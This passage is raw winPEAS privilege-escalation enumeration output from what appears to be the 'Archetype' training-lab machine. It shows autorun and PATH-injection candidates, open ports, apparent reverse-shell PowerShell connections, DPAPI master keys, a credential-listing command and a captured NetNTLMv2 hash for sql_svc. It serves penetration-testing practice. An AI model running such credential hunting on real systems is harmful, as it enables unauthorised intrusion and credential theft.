Key: coml2
Folder: None (PATH Injection)
File: coml2.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: DifxApi
Folder: None (PATH Injection)
File: difxapi.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: gdi32
Folder: None (PATH Injection)
File: gdi32.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: gdiplus
Folder: None (PATH Injection)
File: gdiplus.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: IMAGEHLP
Folder: None (PATH Injection)
File: IMAGEHLP.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: IMM32
Folder: None (PATH Injection)
File: IMM32.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: kernel32
Folder: None (PATH Injection)
File: kernel32.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: MSCTF
Folder: None (PATH Injection)
File: MSCTF.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: MSVCRT
Folder: None (PATH Injection)
File: MSVCRT.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: NORMALIZ
Folder: None (PATH Injection)
File: NORMALIZ.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: NSI
Folder: None (PATH Injection)
File: NSI.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: ole32
Folder: None (PATH Injection)
File: ole32.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: OLEAUT32
Folder: None (PATH Injection)
File: OLEAUT32.dll

=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: PSAPI
Folder: None (PATH Injection)
File: PSAPI.DLL

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: rpcrt4
Folder: None (PATH Injection)
File: rpcrt4.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: sechost
Folder: None (PATH Injection)
File: sechost.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: Setupapi
Folder: None (PATH Injection)
File: Setupapi.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHCORE
Folder: None (PATH Injection)
File: SHCORE.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHELL32
Folder: None (PATH Injection)
File: SHELL32.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHLWAPI
Folder: None (PATH Injection)
File: SHLWAPI.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: user32
Folder: None (PATH Injection)
File: user32.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: WLDAP32
Folder: None (PATH Injection)
File: WLDAP32.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: wow64
Folder: None (PATH Injection)
File: wow64.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: wow64win
Folder: None (PATH Injection)
File: wow64win.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: WS2_32
Folder: None (PATH Injection)
File: WS2_32.dll

=================================================================================================

RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}
Key: StubPath
Folder: None (PATH Injection)
File: U

=================================================================================================

RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,Install

=================================================================================================

RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
Key: StubPath
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install

=================================================================================================

Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787

=================================================================================================

Folder: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
FolderPerms: sql_svc [AllAccess]
File: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows,C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
FilePerms: sql_svc [AllAccess]
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787

=================================================================================================

Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]

=================================================================================================

Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]

=================================================================================================

Folder: C:\windows
File: C:\windows\system.ini

=================================================================================================

Folder: C:\windows
File: C:\windows\win.ini

=================================================================================================

Key: From WMIC
Folder: C:\Program Files\VMware\VMware Tools
File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr

=================================================================================================


╔══════════╣ Scheduled Applications --Non Microsoft--
╚ Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html

╔══════════╣ Device Drivers --Non Microsoft--
╚ Check 3rd party drivers for known vulnerabilities/rootkits. https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#drivers
QLogic Gigabit Ethernet - 7.12.31.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxvbda.sys
QLogic 10 GigE - 7.13.65.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\evbda.sys
NVIDIA nForce(TM) RAID Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvraid.sys
QLogic FastLinQ Ethernet - 8.33.20.103 [Cavium, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qevbda.sys
VMware vSockets Service - 9.8.17.0 build-16460229 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vsock.sys
VMware PCI VMCI Bus Device - 9.8.16.0 build-14168184 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmci.sys
Intel Matrix Storage Manager driver - 8.6.2.1019 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorV.sys
LSI SSS PCIe/Flash Driver (StorPort) - 2.10.61.81 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sss.sys
QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadi.sys
QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadfcoei.sys
Emulex WS2K12 Storport Miniport Driver x64 - 11.0.247.8000 01/26/2016 WS2K12 64 bit x64 [Emulex]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxfcoe.sys
Emulex WS2K12 Storport Miniport Driver x64 - 11.4.225.8009 11/15/2017 WS2K12 64 bit x64 [Broadcom]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxstor.sys
QLogic iSCSI offload driver - 8.33.5.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qeois.sys
QLogic Fibre Channel Stor Miniport Driver - 9.1.15.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql2300i.sys
QLA40XX iSCSI Host Bus Adapter - 2.1.5.0 (STOREx wx64) [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql40xx2i.sys
QLogic FCoE Stor Miniport Inbox Driver - 9.1.11.3 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qlfcoei.sys
Chelsio Communications iSCSI Controller - 10.0.10011.16384 [Chelsio Communications]: \\.\GLOBALROOT\SystemRoot\System32\drivers\cht4sx64.sys
LSI 3ware RAID Controller - WindowsBlue [LSI]: \\.\GLOBALROOT\SystemRoot\System32\drivers\3ware.sys
AHCI 1.3 Device Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsata.sys
Storage Filter Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdxata.sys
AMD Technology AHCI Compatible Controller - 3.7.1540.43 [AMD Technologies Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsbs.sys
Adaptec RAID Controller - 7.5.0.32048 [PMC-Sierra, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\arcsas.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ItSas35i.sys
LSI Fusion-MPT SAS Driver (StorPort) - 1.34.03.83 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas2i.sys
MEGASAS RAID Controller Driver for Windows - 6.706.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas3i.sys
MEGASAS RAID Controller Driver for Windows - 6.714.05.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\MegaSas2i.sys
MEGASAS RAID Controller Driver for Windows - 7.705.08.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas35i.sys
MegaRAID Software RAID - 15.02.2013.0129 [LSI Corporation, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasr.sys
Marvell Flash Controller - 1.0.5.1016 [Marvell Semiconductor, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\mvumis.sys
NVIDIA nForce(TM) SATA Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvstor.sys
MEGASAS RAID Controller Driver for Windows - 6.805.03.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas2i.sys
Microsoft® Windows® Operating System - 6.1.6918.0 [Silicon Integrated Systems]: \\.\GLOBALROOT\SystemRoot\System32\drivers\sisraid4.sys
Promise® SuperTrak EX Series - 5.1.0000.10 [Promise Technology, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\stexstor.sys
VIA RAID driver - 7.0.9600,6352 [VIA Technologies Inc.,Ltd]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vsmraid.sys
VIA StorX RAID Controller Driver - 8.0.9200.8110 [VIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vstxraid.sys
Intel(R) Rapid Storage Technology driver (inbox) - 15.44.0.1010 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorAVC.sys
PMC-Sierra HBA Controller - 1.3.0.10769 [PMC-Sierra]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ADP80XX.SYS
Smart Array SAS/SATA Controller Media Driver - 8.0.4.0 Build 1 Media Driver (x86-64) [Hewlett-Packard Company]: \\.\GLOBALROOT\SystemRoot\System32\drivers\HpSAMD.sys
MEGASAS RAID Controller Driver for Windows - 6.604.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas3i.sys
Microsoft® Windows® Operating System - 2.60.01 [Silicon Integrated Systems Corp.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SiSRaid2.sys
SmartRAID, SmartHBA PQI Storport Driver - 1.50.0.0 [Microsemi Corportation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SmartSAMD.sys
QLogic FCoE offload driver - 8.33.4.2 [Cavium, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qefcoe.sys
QLogic iSCSI offload driver - 7.14.7.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxois.sys
QLogic FCoE Offload driver - 7.14.15.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxfcoe.sys
VMware Pointing USB Device Driver - 12.5.10.0 build-14169150 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmusbmouse.sys
VMware Pointing PS/2 Device Driver - 12.5.10.0 build-14169150 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmmouse.sys
VMware SVGA 3D - 8.17.02.0012 - build-17216209 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp_loader.sys
VMware SVGA 3D - 8.17.02.0012 - build-17216209 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp.sys
VMware PCIe Ethernet Adapter NDIS 6.30 (64-bit) - 1.8.17.0 build-17274505 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmxnet3.sys
VMware server memory controller - 7.5.5.0 build-14903665 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmmemctl.sys


════════════════════════════════════╣ Network Information ╠════════════════════════════════════

╔══════════╣ Network Shares
ADMIN$ (Path: C:\Windows)
backups (Path: C:\backups)
C$ (Path: C:\)
IPC$ (Path: )

╔══════════╣ Enumerate Network Mapped Drives (WMI)
Local Name       : T:
Remote Name      : \\Archetype\backups
Remote Path      : \\Archetype\backups
Status           : Unavailable
Connection State : Disconnected
Persistent       : True
UserName         :
Description      : RESOURCE REMEMBERED - Microsoft Windows Network

=================================================================================================

╔══════════╣ Host File

╔══════════╣ Network Ifaces and known hosts
╚ The masks are only for the IPv4 addresses
Ethernet0 2[00:50:56:B0:46:1A]: 10.129.213.63, fe80::2817:55f4:e2f4:3fbb%7, dead:beef::2817:55f4:e2f4:3fbb / 255.255.0.0
    Gateways: 10.129.0.1, fe80::250:56ff:feb9:1486%7
    DNSs: 1.1.1.1, 1.0.0.1
    Known hosts:
    10.129.0.1            00-50-56-B9-14-86     Dynamic
    10.129.10.164         00-50-56-B0-00-BA     Dynamic
    10.129.26.134         00-50-56-B0-CD-85     Dynamic
    10.129.67.186         00-50-56-B0-68-D1     Dynamic
    10.129.95.187         00-50-56-B0-B8-1A     Dynamic
    10.129.114.3          00-50-56-B0-93-5B     Dynamic
    10.129.165.88         00-50-56-B0-6B-8A     Dynamic
    10.129.189.8          00-50-56-B0-A5-93     Dynamic
    10.129.209.43         00-50-56-B0-2B-7F     Dynamic
    10.129.226.218        00-50-56-B0-7B-99     Dynamic
    10.129.255.255        FF-FF-FF-FF-FF-FF     Static
    169.254.45.168        00-50-56-B0-A5-93     Dynamic
    169.254.100.244       00-50-56-B0-7B-99     Dynamic
    169.254.169.254       00-00-00-00-00-00     Invalid
    169.254.201.20        00-50-56-B0-93-5B     Dynamic
    169.254.239.113       00-50-56-B0-68-D1     Dynamic
    169.254.255.255       00-00-00-00-00-00     Invalid
    224.0.0.22            01-00-5E-00-00-16     Static
    224.0.0.251           01-00-5E-00-00-FB     Static
    224.0.0.252           01-00-5E-00-00-FC     Static
    255.255.255.255       FF-FF-FF-FF-FF-FF     Static

Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
    DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
    Known hosts:
    224.0.0.22            00-00-00-00-00-00     Static

╔══════════╣ Current TCP Listening Ports
╚ Check for services restricted from the outside
Enumerating IPv4 connections

Protocol   Local Address                    Local Port   Remote Address                   Remote Port   State         Process ID   Process Name

TCP        0.0.0.0                          135          0.0.0.0                          0             Listening     840          svchost
TCP        0.0.0.0                          445          0.0.0.0                          0             Listening     4            System
TCP        0.0.0.0                          1433         0.0.0.0                          0             Listening     1652         C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP        0.0.0.0                          5985         0.0.0.0                          0             Listening     4            System
TCP        0.0.0.0                          47001        0.0.0.0                          0             Listening     4            System
TCP        0.0.0.0                          49664        0.0.0.0                          0             Listening     464          wininit
TCP        0.0.0.0                          49665        0.0.0.0                          0             Listening     940          svchost
TCP        0.0.0.0                          49666        0.0.0.0                          0             Listening     984          svchost
TCP        0.0.0.0                          49667        0.0.0.0                          0             Listening     1124         svchost
TCP        0.0.0.0                          49668        0.0.0.0                          0             Listening     600          services
TCP        0.0.0.0                          49669        0.0.0.0                          0             Listening     620          lsass
TCP        10.129.213.63                    139          0.0.0.0                          0             Listening     4            System
TCP        10.129.213.63                    1433         10.10.16.50                      39040         Established   1652         C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP        10.129.213.63                    49677        10.10.16.50                      8888          Close Wait    1800         C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TCP        10.129.213.63                    49682        10.10.16.50                      8888          Established   744          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TCP        10.129.213.63                    49697        10.10.16.50                      8888          Established   1216         C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TCP        127.0.0.1                        1434         0.0.0.0                          0             Listening     1652         C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe

Enumerating IPv6 connections

Protocol   Local Address                    Local Port   Remote Address                   Remote Port   State         Process ID   Process Name

TCP        [::]                             135          [::]                             0             Listening     840          svchost
TCP        [::]                             445          [::]                             0             Listening     4            System
TCP        [::]                             1433         [::]                             0             Listening     1652         C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP        [::]                             5985         [::]                             0             Listening     4            System
TCP        [::]                             47001        [::]                             0             Listening     4            System
TCP        [::]                             49664        [::]                             0             Listening     464          wininit
TCP        [::]                             49665        [::]                             0             Listening     940          svchost
TCP        [::]                             49666        [::]                             0             Listening     984          svchost
TCP        [::]                             49667        [::]                             0             Listening     1124         svchost
TCP        [::]                             49668        [::]                             0             Listening     600          services
TCP        [::]                             49669        [::]                             0             Listening     620          lsass
TCP        [::1]                            1434         [::]                             0             Listening     1652         C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP        [fe80::2817:55f4:e2f4:3fbb%7]    445          [fe80::2817:55f4:e2f4:3fbb%7]    49699         Established   4            System
TCP        [fe80::2817:55f4:e2f4:3fbb%7]    49699        [fe80::2817:55f4:e2f4:3fbb%7]    445           Established   4            System

╔══════════╣ Current UDP Listening Ports
╚ Check for services restricted from the outside
Enumerating IPv4 connections

Protocol   Local Address                    Local Port   Remote Address:Remote Port   Process ID   Process Name

UDP        0.0.0.0                          123          *:*                          1304         svchost
UDP        0.0.0.0                          500          *:*                          984          svchost
UDP        0.0.0.0                          4500         *:*                          984          svchost
UDP        0.0.0.0                          5353         *:*                          320          svchost
UDP        0.0.0.0                          5355         *:*                          320          svchost
UDP        10.129.213.63                    137          *:*                          4            System
UDP        10.129.213.63                    138          *:*                          4            System
UDP        127.0.0.1                        53997        *:*                          984          svchost

Enumerating IPv6 connections

Protocol   Local Address                    Local Port   Remote Address:Remote Port   Process ID   Process Name

UDP        [::]                             123          *:*                          1304         svchost
UDP        [::]                             500          *:*                          984          svchost
UDP        [::]                             4500         *:*                          984          svchost
UDP        [::]                             5353         *:*                          320          svchost
UDP        [::]                             5355         *:*                          320          svchost

╔══════════╣ Firewall Rules
╚ Showing only DENY rules (too many ALLOW rules always)
Current Profiles: PUBLIC
FirewallEnabled (Domain): False
FirewallEnabled (Private): False
FirewallEnabled (Public): False
DENY rules:

╔══════════╣ DNS cached --limit 70--
Entry                                 Name                                  Data

╔══════════╣ Enumerating Internet settings, zone and proxy configuration
General Settings
Hive    Key                         Value
HKCU    DisableCachingOfSSLPages    0
HKCU    IE5_UA_Backup_Flag          5.0
HKCU    PrivacyAdvanced             1
HKCU    SecureProtocols             2688
HKCU    User Agent                  Mozilla/4.0 (compatible; MSIE 8.0; Win32)
HKCU    CertificateRevocation       1
HKCU    ZonesSecurityUpgrade        System.Byte[]
HKCU    EnableNegotiate             1
HKCU    ProxyEnable                 0
HKLM    EnablePunycode              1

Zone Maps
No URLs configured

Zone Auth Settings
No Zone Auth Settings

════════════════════════════════════╣ Cloud Information ╠════════════════════════════════════
Learn and practice cloud hacking in training.hacktricks.xyz
AWS EC2? No
Azure VM? No
Azure Tokens? No
Google Cloud Platform? No
Google Workspace Joined? No
Google Cloud Directory Sync? No
Google Password Sync? No

════════════════════════════════════╣ Windows Credentials ╠════════════════════════════════════

╔══════════╣ Checking Windows Vault
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault
Not Found

╔══════════╣ Checking Credential manager
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault
[!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string

[!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): Element not found'
Please run:
cmdkey /list

╔══════════╣ Saved RDP connections
Not Found

╔══════════╣ Remote Desktop Server/Client Settings
RDP Server Settings
    Network Level Authentication            :
    Block Clipboard Redirection             :
    Block COM Port Redirection              :
    Block Drive Redirection                 :
    Block LPT Port Redirection              :
    Block PnP Device Redirection            :
    Block Printer Redirection               :
    Allow Smart Card Redirection            :

RDP Client Settings
    Disable Password Saving                 : True
    Restricted Remote Administration        : False

╔══════════╣ Recently run commands
Not Found

╔══════════╣ Checking for DPAPI Master Keys
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi
MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-1479773013-2644727484-962428355-1001\6fc21731-a2de-4f1a-aeeb-ed5c000f18ca
Accessed: 1/19/2020 3:10:06 PM
Modified: 1/19/2020 3:10:06 PM

=================================================================================================

MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-1479773013-2644727484-962428355-1001\9499e43c-ccd0-4465-b19f-3d9ced256dd5
Accessed: 3/7/2025 8:06:38 AM
Modified: 3/7/2025 8:06:38 AM

=================================================================================================

MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-1479773013-2644727484-962428355-1001\9f851a43-e6fe-4ab5-9be0-c931324190ab
Accessed: 7/26/2021 9:14:39 AM
Modified: 7/26/2021 9:14:39 AM

=================================================================================================

╔══════════╣ Checking for DPAPI Credential Files
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi
Not Found

╔══════════╣ Checking for RDCMan Settings Files
╚ Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#remote-desktop-credential-manager
Not Found

╔══════════╣ Looking for Kerberos tickets
╚ https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-88/index.html
Not Found

╔══════════╣ Looking for saved Wifi credentials
[X] Exception: Unable to load DLL 'wlanapi.dll': The specified module could not be found. (Exception from HRESULT: 0x8007007E)
Enumerating WLAN using wlanapi.dll failed, trying to enumerate using 'netsh'
No saved Wifi credentials found

╔══════════╣ Looking AppCmd.exe
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#appcmdexe
Not Found
You must be an administrator to run this check

╔══════════╣ Looking SSClient.exe
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#scclient--sccm
Not Found

╔══════════╣ Enumerating SSCM - System Center Configuration Manager settings

╔══════════╣ Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash:    sql_svc::ARCHETYPE:1122334455667788:44ae39a45e3ed3759d0be884599e73d2:0101000000000000856d0d3aa08fdb01133b7281d6cef6440000000008003000300000000000000000000000003000003569707567b564c32c0d90ffc4ccd97ecacf3dc4f89ce86bb89f0bf1b545089d0a00100000000000000000000000000000000000000090000000000000000000000

=================================================================================================


????????????????????????????????????? Browsers
Information ?????????????????????????????????????

???????????? Showing saved credentials for Firefox


Info: if no credentials were listed, you might need to close the browser and
try again.

╔══════════╣ Looking for Firefox DBs
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Not Found

╔══════════╣ Looking for GET credentials in Firefox history
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Not Found

╔══════════╣ Showing saved credentials for Chrome
Info: if no credentials were listed, you might need to close the browser and try again.

╔══════════╣ Looking for Chrome DBs
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Not Found

╔══════════╣ Looking for GET credentials in Chrome history
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Not Found

╔══════════╣ Chrome bookmarks
Not Found

╔══════════╣ Showing saved credentials for Opera
Info: if no credentials were listed, you might need to close the browser and try again.

╔══════════╣ Showing saved credentials for Brave Browser
Info: if no credentials were listed, you might need to close the browser and try again.

╔══════════╣ Showing saved credentials for Internet Explorer (unsupported)
Info: if no credentials were listed, you might need to close the browser and try again.

╔══════════╣ Current IE tabs
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
[X] Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.InteropServices.COMException: Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG))
   --- End of inner exception stack trace ---
   at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters)
   at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)
   at winPEAS.KnownFileCreds.Browsers.InternetExplorer.GetCurrentIETabs()
Not Found

╔══════════╣ Looking for GET credentials in IE history
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Not Found

╔══════════╣ IE favorites
Not Found

════════════════════════════════════╣ Interesting files and registry ╠════════════════════════════════════

╔══════════╣ Putty Sessions
Not Found

╔══════════╣ Putty SSH Host keys
Not Found

╔══════════╣ SSH keys in registry
╚ If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#ssh-keys-in-registry
Not Found

╔══════════╣ SuperPutty configuration files

╔══════════╣ Enumerating Office 365 endpoints synced by OneDrive.

SID: S-1-5-19

=================================================================================================

SID: S-1-5-20

=================================================================================================

SID: S-1-5-21-1479773013-2644727484-962428355-1001

=================================================================================================

SID: S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775

=================================================================================================

SID: S-1-5-18

=================================================================================================

╔══════════╣ Cloud Credentials
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
Not Found

╔══════════╣ Unattend Files

╔══════════╣ Looking for common SAM & SYSTEM backups

╔══════════╣ Looking for McAfee Sitelist.xml Files

╔══════════╣ Cached GPP Passwords

╔══════════╣ Looking for possible regs with creds
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#inside-the-registry
Not Found
Not Found
Not Found
Not Found

╔══════════╣ Looking for possible password files in users homes
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials

╔══════════╣ Searching for Oracle SQL Developer config files

╔══════════╣ Slack files & directories
note: check manually if something is found

╔══════════╣ Looking for LOL Binaries and Scripts (can be slow)
╚ https://lolbas-project.github.io/
[!] Check skipped, if you want to run it, please specify '-lolbas' argument

╔══════════╣ Enumerating Outlook download files

╔══════════╣ Enumerating machine and user certificate files

╔══════════╣ Searching known files that can contain creds in home
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials

╔══════════╣ Looking for documents --limit 100--
Not Found

╔══════════╣ Office Most Recent Files -- limit 50
Last Access Date        User        Application        Document

╔══════════╣ Recent files --limit 70--
Not Found

╔══════════╣ Looking inside the Recycle Bin for creds files
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
Not Found

╔══════════╣ Searching hidden files or folders in C:\Users home (can be slow)

C:\Users\Default
C:\Users\Default User
C:\Users\Default
